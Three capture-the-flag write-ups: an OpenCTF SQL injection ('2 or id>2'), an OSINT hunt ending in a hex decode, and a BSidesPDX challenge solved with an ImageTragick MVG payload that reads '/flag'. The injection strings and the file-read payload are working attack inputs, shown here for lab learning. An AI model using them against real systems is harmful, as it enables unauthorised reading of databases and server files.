Aug 12, 2018 - OpenCTF : SQL 10

Author: Fl0rbu5

Publish Date: 2018-08-12

Category: Web

Points: 10


When 1 is entered it returns the following row:

Enter a badge number to view that officers file:1
(1, 'bob', 'simmons', 'none')

Performing a basic sql injection we got the same row back but no error. The server only returns 1 row

Enter a badge number to view that officers file:1 or 1=1
(1, 'bob', 'simmons', 'none')

Entering an ID of 2 no results are found.

Enter a badge number to view that officers file:2 

Using the sql injection an OR was added to say “id>2”

Enter a badge number to view that officers file:2 or id>2
(152135123451, 'flag', 'flag', '[email protected]@[email protected]')

This returns the flag in the one other row in the database


[email protected]@[email protected]

Aug 12, 2018 - OpenCTF : Ellingson Mineral 2

Author: Fl0rbu5

Publish Date: 2018-08-12

Category: OSINT

Points: 100


We heard word that The Plague escaped prison three weeks ago. We've been notified that he was recently seen on soundcloud liking a song by ytcracker called "hacker music." Let us know what you find.

First perform a search on for “ytcracker hacker music” then go to likes.

Go to ThePlague2018x’s profile

The next clue seemed to be to go to the website on ThePlague2018x’s website which is the following

Extract the string after the hex values “%3A%2F%2F” to “.com” the value between this is the following


Looking at the string it seems to be hex so encode to hex to get the flag.

>>> '666c61677b74684552655f69735f4e305f72314768745f614e445f5752306e475f74683352655f31735f4f4e6c795f46754e5f416e645f423072694e477d'.decode('hex')



Oct 21, 2017 - BSidesPDX CTF : MakeIcon

Author: dade

Publish Date: 2017-10-21

Category: Web

Points: 300


It's free, as in baby.



The BSidesPDX organizers have made the source code for all of their challenges freely available so that you can run them at home and follow along. You can find more information here.


Upon loading the screen, we are presented with a file upload and a button to make a jpeg icon. We also note that the version string indicates it was made in 2016, with a version of Version 2016.3717. After playing around with it for a little while, I thought about how there was that ImageMagick bug last year that let you execute code remotely. I wasn’t sure it would work, but it was worth a shot.

As I hunted down the ImageMagick bug, it became painfully apparent that the Version string provided to us was also the CVE number associated with the ImageTragick bug.

From the ImageTragick site, I decided to take the read_file.mvg file and tweak it to meet my needs.

push graphic-context
viewbox 0 0 64 48
image over 0,0 0,0 'label:@/flag'
pop graphic-context

I suspected that the flag would be in /flag since we had solved other challenges where the flag was in /flag. Luckily I was right, and upon upload I was presented with the first few characters of the flag. Unfortunately I didn’t realize there was a hidden field being sent to determine the output size of the icon, so I wasted a lot of time coming up with this solution.


I uploaded the read_file.mvg file a total of 5 times, modifying the image over line each time in order to shift what I was able to view and move along the string. In order to do this, I had to set the first value (immediately after ‘over’) to -64, -128, -192, -256, and -320. This allowed me to read each section of the flag inside the tiny 64x48 viewport, instead of just modifying the hidden field to produce a bigger image.